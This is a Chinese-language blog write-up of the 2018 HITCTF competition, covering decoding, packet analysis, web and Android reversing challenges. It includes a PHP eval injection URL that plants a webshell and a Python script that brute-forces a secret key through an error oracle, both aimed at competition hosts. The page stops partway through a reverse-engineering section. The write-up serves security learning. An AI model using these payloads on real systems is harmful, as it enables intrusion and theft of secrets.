<!doctype html>



  


<html class="theme-next mist use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="CTF,Sec,Writeup," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />






<meta name="description" content="哈工大的校赛，抽了两个下午打了几个小时，还是菜了2333。记录一下。">
<meta property="og:type" content="article">
<meta property="og:title" content="2018HITCTF-WriteUp">
<meta property="og:url" content="http://www.leommxj.com/2018/02/02/2018HITCTF-WriteUp/index.html">
<meta property="og:site_name" content="Stop Here">
<meta property="og:description" content="哈工大的校赛，抽了两个下午打了几个小时，还是菜了2333。记录一下。">
<meta property="og:image" content="http://pic.leommxj.com/201802022024_664.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022028_50.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022030_211.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022033_818.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022034_426.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022038_498.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022040_532.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022044_522.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022049_37.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022051_138.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022053_14.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022055_635.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022105_357.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022131_817.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022133_423.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022140_525.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022140_210.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022143_285.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022147_673.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022150_476.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022151_461.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022152_211.png">
<meta property="og:image" content="http://pic.leommxj.com/201802022153_420.png">
<meta property="og:updated_time" content="2019-02-20T18:21:19.782Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2018HITCTF-WriteUp">
<meta name="twitter:description" content="哈工大的校赛，抽了两个下午打了几个小时，还是菜了2333。记录一下。">
<meta name="twitter:image" content="http://pic.leommxj.com/201802022024_664.png">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>

  <title> 2018HITCTF-WriteUp | Stop Here </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  



  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?506d4068ac30a997f544c02d629de531";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>








  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Stop Here</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle">And FxxkOff</p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                2018HITCTF-WriteUp
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2018-02-02T19:58:50+08:00" content="2018-02-02">
              2018-02-02
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/Sec/" itemprop="url" rel="index">
                    <span itemprop="name">Sec</span>
                  </a>
                </span>

                
                
                  ， 
                

              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/Sec/Writeup/" itemprop="url" rel="index">
                    <span itemprop="name">Writeup</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>哈工大的校赛，抽了两个下午打了几个小时，还是菜了2333。记录一下。<br><a id="more"></a></p>
<h1 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h1><h2 id="BaSO4"><a href="#BaSO4" class="headerlink" title="BaSO4"></a>BaSO4</h2><p>压缩包中有两个文件，一个pyc和一个编码过后的flag文件。pyc反编译得到代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#!/usr/bin/env python</span></div><div class="line"></div><div class="line"><span class="keyword">import</span> base64</div><div class="line"><span class="keyword">import</span> random</div><div class="line"><span class="keyword">import</span> os</div><div class="line"><span class="keyword">import</span> sys</div><div class="line"><span class="keyword">with</span> open(<span class="string">'flag.txt'</span>, <span class="string">'r'</span>) <span class="keyword">as</span> file:</div><div class="line">    flag = file.read()</div><div class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>, <span class="number">20</span>):</div><div class="line">    <span class="keyword">if</span> random.randint(<span class="number">0</span>, <span class="number">1</span>):</div><div class="line">        flag = base64.b64encode(flag)</div><div class="line">        <span class="keyword">continue</span></div><div class="line">    flag = base64.b32encode(flag)</div><div class="line"></div><div class="line"><span class="keyword">with</span> open(<span class="string">'flag_encode.txt'</span>, <span class="string">'w'</span>) <span class="keyword">as</span> file:</div><div class="line">    file.write(flag)</div></pre></td></tr></table></figure>
<p>编码20次，每次随机base32或base64。根据每次结果含不含小写字母即可判断编码类型，进行解密，python的base64库因为补位的等于号数量会报错，懒得补了直接cyberchef拖几次得到flag</p>
<h2 id="攻击流量分析"><a href="#攻击流量分析" class="headerlink" title="攻击流量分析"></a>攻击流量分析</h2><p><img src="http://pic.leommxj.com/201802022024_664.png" alt=""></p>
<p>wireshark打开后过滤http肉眼即可看到明显异常的数据，第一个文件名base64解码后为index.php，第二个为flag.txt。 于是把第二个的response内容进行gzuncompress得到flag</p>
<p><img src="http://pic.leommxj.com/201802022028_50.png" alt=""></p>
<h2 id="use-your-ida"><a href="#use-your-ida" class="headerlink" title="use_your_ida"></a>use_your_ida</h2><p>这道题就非常有意思了，提供了一个超大的elf文件，ida打开后发现基本上都是没什么用的代码，只有输出一个小白羊的代码有用。</p>
<p><img src="http://pic.leommxj.com/201802022030_211.png" alt=""></p>
<p>经过一番查找发现这是defcon23中写M/o/Vfuscator的大佬的其他小玩意，<a href="https://media.defcon.org/DEF%20CON%2023/DEF%20CON%2023%20presentations/DEFCON-23-Chris-Domas-REpsych.pdf" target="_blank" rel="external">传送门</a> 利用了ida的流程图传递信息，由于ida默认图形显示在函数太大时关闭，调整这个限制的大小(默认为1000)</p>
<p><img src="http://pic.leommxj.com/201802022033_818.png" alt=""></p>
<p>随后看图即可得到flag</p>
<p><img src="http://pic.leommxj.com/201802022034_426.png" alt=""></p>
<h2 id="键盘流量分析"><a href="#键盘流量分析" class="headerlink" title="键盘流量分析"></a>键盘流量分析</h2><p>数据包中有usb键盘和鼠标的数据，先利用tshark提取数据</p>
<p><code>tshark -r keyboard.pcap -T fields -e usb.capdata &gt; usbdata.txt</code></p>
<p>然后利用python脚本解析</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div></pre></td><td class="code"><pre><div class="line">mappings = &#123;</div><div class="line">        <span class="number">0x04</span>:<span class="string">"a"</span>,</div><div class="line">        <span class="number">0x05</span>:<span class="string">"b"</span>,</div><div class="line">        <span class="number">0x06</span>:<span class="string">"c"</span>,</div><div class="line">        <span class="number">0x07</span>:<span class="string">"d"</span>,</div><div class="line">        <span class="number">0x08</span>:<span class="string">"e"</span>,</div><div class="line">        <span class="number">0x09</span>:<span class="string">"f"</span>,</div><div class="line">        <span class="number">0x0A</span>:<span class="string">"g"</span>,</div><div class="line">        <span class="number">0x0B</span>:<span class="string">"h"</span>,</div><div class="line">        <span class="number">0x0C</span>:<span class="string">"i"</span>,</div><div class="line">        <span class="number">0x0D</span>:<span class="string">"j"</span>,</div><div class="line">        <span class="number">0x0E</span>:<span class="string">"k"</span>,</div><div class="line">        <span class="number">0x0F</span>:<span class="string">"l"</span>,</div><div class="line">        <span class="number">0x10</span>:<span class="string">"m"</span>,</div><div class="line">        <span class="number">0x11</span>:<span class="string">"n"</span>,</div><div class="line">        <span class="number">0x12</span>:<span class="string">"o"</span>,</div><div class="line">        <span class="number">0x13</span>:<span class="string">"p"</span>,</div><div class="line">        <span class="number">0x14</span>:<span class="string">"q"</span>,</div><div class="line">        <span class="number">0x15</span>:<span class="string">"r"</span>,</div><div class="line">        <span class="number">0x16</span>:<span class="string">"s"</span>,</div><div class="line">        <span class="number">0x17</span>:<span class="string">"t"</span>,</div><div class="line">        <span class="number">0x18</span>:<span class="string">"u"</span>,</div><div class="line">        <span class="number">0x19</span>:<span class="string">"v"</span>,</div><div class="line">        <span class="number">0x1A</span>:<span class="string">"w"</span>,</div><div class="line">        <span class="number">0x1B</span>:<span class="string">"x"</span>,</div><div class="line">        <span class="number">0x1C</span>:<span class="string">"y"</span>,</div><div class="line">        <span class="number">0x1D</span>:<span class="string">"z"</span>,</div><div class="line">        <span class="number">0x1E</span>:<span class="string">"1"</span>,</div><div class="line">        <span class="number">0x1F</span>:<span class="string">"2"</span>,</div><div class="line">        <span class="number">0x20</span>:<span class="string">"3"</span>,</div><div class="line">        <span class="number">0x21</span>:<span class="string">"4"</span>,</div><div class="line">        <span class="number">0x22</span>:<span class="string">"5"</span>,</div><div class="line">        <span class="number">0x23</span>:<span class="string">"6"</span>,</div><div class="line">        <span class="number">0x24</span>:<span class="string">"7"</span>,</div><div class="line">        <span class="number">0x25</span>:<span class="string">"8"</span>,</div><div class="line">        <span class="number">0x26</span>:<span class="string">"9"</span>,</div><div class="line">        <span class="number">0x27</span>:<span class="string">"0"</span>,</div><div class="line">        <span class="number">0x28</span>:<span class="string">"\n"</span>,</div><div class="line">        <span class="number">0x2C</span>:<span class="string">" "</span>,</div><div class="line">        <span class="number">0x2D</span>:<span class="string">"-"</span>,</div><div class="line">        <span class="number">0x2E</span>:<span class="string">"="</span>,</div><div class="line">        <span class="number">0x2F</span>:<span class="string">"["</span>,</div><div class="line">        <span class="number">0x30</span>:<span class="string">"]"</span>,</div><div class="line">        <span class="number">0x34</span>:<span class="string">"A"</span>,</div><div class="line">        <span class="number">0x35</span>:<span class="string">"B"</span>,</div><div class="line">        <span class="number">0x36</span>:<span class="string">"C"</span>,</div><div class="line">        <span class="number">0x37</span>:<span class="string">"D"</span>,</div><div class="line">        <span class="number">0x38</span>:<span class="string">"E"</span>,</div><div class="line">        <span class="number">0x39</span>:<span class="string">"F"</span>,</div><div class="line">        <span class="number">0x3A</span>:<span class="string">"G"</span>,</div><div class="line">        <span class="number">0x3B</span>:<span class="string">"H"</span>,</div><div class="line">        <span class="number">0x3C</span>:<span class="string">"I"</span>,</div><div class="line">        <span class="number">0x3D</span>:<span class="string">"J"</span>,</div><div class="line">        <span class="number">0x3E</span>:<span class="string">"K"</span>,</div><div class="line">        <span class="number">0x3F</span>:<span class="string">"L"</span>,</div><div class="line">        <span class="number">0x40</span>:<span class="string">"M"</span>,</div><div class="line">        <span class="number">0x41</span>:<span class="string">"N"</span>,</div><div class="line">        <span class="number">0x42</span>:<span class="string">"O"</span>,</div><div class="line">        <span class="number">0x43</span>:<span class="string">"P"</span>,</div><div class="line">        <span class="number">0x44</span>:<span class="string">"Q"</span>,</div><div class="line">        <span class="number">0x45</span>:<span class="string">"R"</span>,</div><div class="line">        <span class="number">0x46</span>:<span class="string">"S"</span>,</div><div class="line">        <span class="number">0x47</span>:<span class="string">"T"</span>,</div><div class="line">        <span class="number">0x48</span>:<span class="string">"U"</span>,</div><div class="line">        <span class="number">0x49</span>:<span class="string">"V"</span>,</div><div class="line">        <span class="number">0x4A</span>:<span class="string">"W"</span>,</div><div class="line">        <span class="number">0x4B</span>:<span class="string">"X"</span>,</div><div class="line">        <span class="number">0x4C</span>:<span class="string">"Y"</span>,</div><div class="line">        <span class="number">0x4D</span>:<span class="string">"Z"</span>,</div><div class="line">        <span class="number">0x4E</span>:<span class="string">"!"</span>,</div><div class="line">        <span class="number">0x4F</span>:<span class="string">"@"</span>,</div><div class="line">        <span class="number">0x50</span>:<span class="string">"#"</span>,</div><div class="line">        <span class="number">0x51</span>:<span class="string">"$"</span>,</div><div class="line">        <span class="number">0x52</span>:<span class="string">"%"</span>,</div><div class="line">        <span class="number">0x53</span>:<span class="string">"^"</span>,</div><div class="line">        <span class="number">0x54</span>:<span class="string">"&amp;"</span>,</div><div class="line">        <span class="number">0x55</span>:<span class="string">"*"</span>,</div><div class="line">        <span class="number">0x56</span>:<span class="string">"("</span>,</div><div class="line">        <span class="number">0x57</span>:<span class="string">")"</span>,</div><div class="line">        <span class="number">0x58</span>:<span class="string">"\n"</span>,</div><div class="line">        <span class="number">0x5C</span>:<span class="string">" "</span>,</div><div class="line">        <span class="number">0x5D</span>:<span class="string">"_"</span>,</div><div class="line">        <span class="number">0x5E</span>:<span class="string">"+"</span>,</div><div class="line">        <span class="number">0x5F</span>:<span class="string">"&#123;"</span>,</div><div class="line">        <span class="number">0x60</span>:<span class="string">"&#125;"</span></div><div class="line">        &#125;</div><div class="line"></div><div class="line">nums = []</div><div class="line">keys = open(<span class="string">'usbdata.txt'</span>)</div><div class="line"><span class="keyword">for</span> line <span class="keyword">in</span> keys:</div><div class="line">    <span class="comment">#if line[0]!='0' or line[1]!='0' or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0':</span></div><div class="line">    <span class="keyword">if</span> len(line)!=<span class="number">24</span>:</div><div class="line">        <span class="keyword">continue</span></div><div class="line">    <span class="keyword">if</span> line[<span class="number">1</span>]==<span class="string">'2'</span>:</div><div class="line">    	nums.append(int(line[<span class="number">6</span>:<span class="number">8</span>],<span class="number">16</span>)+<span class="number">0x30</span>)</div><div class="line">    <span class="keyword">else</span>:</div><div class="line">    	nums.append(int(line[<span class="number">6</span>:<span class="number">8</span>],<span class="number">16</span>))</div><div class="line">keys.close()</div><div class="line">output = <span class="string">""</span></div><div class="line"><span class="keyword">for</span> n <span class="keyword">in</span> nums:</div><div class="line">    <span class="keyword">if</span> n == <span class="number">0</span> :</div><div class="line">        <span class="keyword">continue</span></div><div class="line">    <span class="keyword">if</span> n <span class="keyword">in</span> mappings:</div><div class="line">        output += mappings[n]</div><div class="line">    <span class="keyword">else</span>:</div><div class="line">        output += <span class="string">'[unknown]'</span></div><div class="line"><span class="keyword">print</span> <span class="string">'output :n'</span> + output</div></pre></td></tr></table></figure>
<p>忽略长度较短的鼠标数据。因为大小写所以判断一下shift状态，得到的结果稍微处理下得到flag</p>
<p><img src="http://pic.leommxj.com/201802022038_498.png" alt=""></p>
<h1 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h1><h2 id="PHPreading"><a href="#PHPreading" class="headerlink" title="PHPreading"></a>PHPreading</h2><p>访问index.php.bak得到源码</p>
<p><img src="http://pic.leommxj.com/201802022040_532.png" alt=""></p>
<p>base64解码得到</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$flag=$_GET[<span class="string">'asdfgjxzkallgj8852'</span>];<span class="keyword">if</span>($flag==<span class="string">'H1TctF2018EzCTF'</span>)&#123;<span class="keyword">die</span>($flag);&#125;<span class="keyword">die</span>(<span class="string">'emmmm'</span>);</div></pre></td></tr></table></figure>
<p>按要求构造请求得到flag</p>
<h2 id="BabyEval"><a href="#BabyEval" class="headerlink" title="BabyEval"></a>BabyEval</h2><p><img src="http://pic.leommxj.com/201802022044_522.png" alt=""></p>
<p>浏览源代码发现提示。利用花括号和美元符执行代码，两层来绕过addslashes，<code>${eval(...)}</code>让php认为里面为变量名所以不进行过滤，而再加一层又成为了字符串。因为过滤了引号，为了方便通过另一个参数传递命令<code>http://120.24.215.80:10013/index.php?str=${${eval($_POST[c])}&amp;c=</code>,蚁剑连接，在根目录下找到flag文件。</p>
<p><img src="http://pic.leommxj.com/201802022049_37.png" alt=""></p>
<h2 id="小电影"><a href="#小电影" class="headerlink" title="小电影"></a>小电影</h2><p>ffmpeg任意文件读取漏洞，主页源码中提示了flag文件地址，利用<a href="https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py" target="_blank" rel="external">POC脚本</a>构造avi文件上传</p>
<p><img src="http://pic.leommxj.com/201802022051_138.png" alt=""></p>
<p>下载得到flag</p>
<p><img src="http://pic.leommxj.com/201802022053_14.png" alt=""></p>
<h2 id="SecurePY"><a href="#SecurePY" class="headerlink" title="SecurePY"></a>SecurePY</h2><p>找到了原题大佬的题解,<a href="http://webdog.top/tokyo-west-ctf-2017-web/" target="_blank" rel="external">传送门</a></p>
<p><img src="http://pic.leommxj.com/201802022055_635.png" alt=""></p>
<p>python3中<code>__pycache__</code>存放编译好的pyc文件，访问manage.py发现403,于是访问<code>http://123.206.83.157:8000/__pycache__/app.cpython-35.pyc</code></p>
<p>下载到app文件，查看代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#!/usr/bin/env python</span></div><div class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, jsonify, render_template</div><div class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> AES</div><div class="line"><span class="keyword">from</span> binascii <span class="keyword">import</span> b2a_hex, a2b_hex</div><div class="line"><span class="keyword">import</span> os</div><div class="line">app = Flask(__name__)</div><div class="line">flag_key = os.environ[<span class="string">'KEY'</span>]</div><div class="line">flag_enc = <span class="string">'9cf742955633f38d9c628bc9a9f98db042c6e4273a99944bc4cd150a0f7b9f317f52030329729ccf80798690667a0add'</span></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span><span class="params">()</span>:</span></div><div class="line">    <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>, flag_enc = flag_enc)</div><div class="line"></div><div class="line">index = app.route(<span class="string">'/'</span>)(index)</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">getflag</span><span class="params">()</span>:</span></div><div class="line">    req = request.json</div><div class="line">    <span class="keyword">if</span> <span class="keyword">not</span> req:</div><div class="line">        <span class="keyword">return</span> jsonify(result = <span class="keyword">False</span>)</div><div class="line">    <span class="keyword">if</span> <span class="keyword">None</span> <span class="keyword">not</span> <span class="keyword">in</span> req:</div><div class="line">        <span class="keyword">return</span> jsonify(result = <span class="keyword">False</span>)</div><div class="line">    key = <span class="keyword">None</span>[<span class="string">'key'</span>]</div><div class="line">    <span class="keyword">if</span> len(key) != len(flag_key):</div><div class="line">        <span class="keyword">return</span> jsonify(result = <span class="keyword">False</span>)</div><div class="line">    <span class="keyword">for</span> (x, y) <span class="keyword">in</span> zip(key, flag_key):</div><div class="line">        <span class="keyword">if</span> ord(x) ^ ord(y):</div><div class="line">            <span class="keyword">return</span> jsonify(result = <span class="keyword">False</span>)</div><div class="line">    cryptor = AES.new(key, AES.MODE_CBC, <span class="string">b'0000000000000000'</span>)</div><div class="line">    plain_text = cryptor.decrypt(a2b_hex(flag_enc))</div><div class="line">    flag = plain_text.decode(<span class="string">'utf-8'</span>).strip()</div><div class="line">    <span class="keyword">return</span> jsonify(result = <span class="keyword">True</span>, flag = flag)</div><div class="line"></div><div class="line">getflag = app.route(<span class="string">'/getflag'</span>, methods = [</div><div class="line">    <span class="string">'POST'</span>])(getflag)</div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</div><div class="line">    app.run()</div></pre></td></tr></table></figure>
<p>由于其在判断两key是否相等时通过异或来对比，异或遇到null会报错，而输入又没有做过检测，所以可以通过报错来检测长度和爆破每位key</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> requests</div><div class="line"><span class="keyword">import</span> json</div><div class="line">url = <span class="string">"http://123.206.83.157:8000/getflag"</span></div><div class="line">header = &#123;<span class="string">'Content-Type'</span>: <span class="string">'application/json;charset=UTF-8'</span>&#125;</div><div class="line">aList = [<span class="string">"null"</span>]</div><div class="line">keylist = <span class="string">"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"</span></div><div class="line">key = <span class="string">''</span></div><div class="line"><span class="keyword">while</span> <span class="keyword">True</span>:</div><div class="line">    data = &#123;<span class="string">'key'</span>:aList&#125;</div><div class="line">    re = requests.post(url, data=json.dumps(data),headers=header)</div><div class="line">    <span class="keyword">if</span> <span class="string">'500'</span> <span class="keyword">in</span> re.content:</div><div class="line">        <span class="keyword">break</span></div><div class="line">    <span class="keyword">else</span>:</div><div class="line">        aList.append(<span class="string">"null"</span>)</div><div class="line"><span class="keyword">print</span> len(aList)</div><div class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(aList)):</div><div class="line">    <span class="keyword">for</span> k <span class="keyword">in</span> keylist:</div><div class="line">        aList[i] = k</div><div class="line">        data = &#123;<span class="string">'key'</span>:aList&#125;</div><div class="line">        re = requests.post(url, data=json.dumps(data),headers=header)</div><div class="line">        <span class="keyword">if</span> <span class="string">'500'</span> <span class="keyword">in</span> re.content:</div><div class="line">            key += k</div><div class="line">            <span class="keyword">print</span> key</div><div class="line">            <span class="keyword">break</span></div></pre></td></tr></table></figure>
<h1 id="REVERSE"><a href="#REVERSE" class="headerlink" title="REVERSE"></a>REVERSE</h1><h2 id="Baby-Android"><a href="#Baby-Android" class="headerlink" title="Baby Android"></a>Baby Android</h2><p><img src="http://pic.leommxj.com/201802022105_357.png" alt=""></p>
<p>jeb打开，发现两个字符串异或，得到flag</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">a = <span class="string">"#$%$#!&amp;#^_^~(:p@_*#######"</span></div><div class="line">b = <span class="string">"kmqgwg]Tm3=NE_/4ouKJW@WE^"</span></div><div class="line"></div><div class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(a)):</div><div class="line">	print(chr(ord(a[i])^ord(b[i])),end=<span class="string">""</span>)</div></pre></td></tr></table></figure>
<h2 id="网管的麒麟臂"><a href="#网管的麒麟臂" class="headerlink" title="网管的麒麟臂"></a>网管的麒麟臂</h2><p>给了c文件和反汇编的结果，估计之前是个pwn题改编的，直接看asm文件就行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div 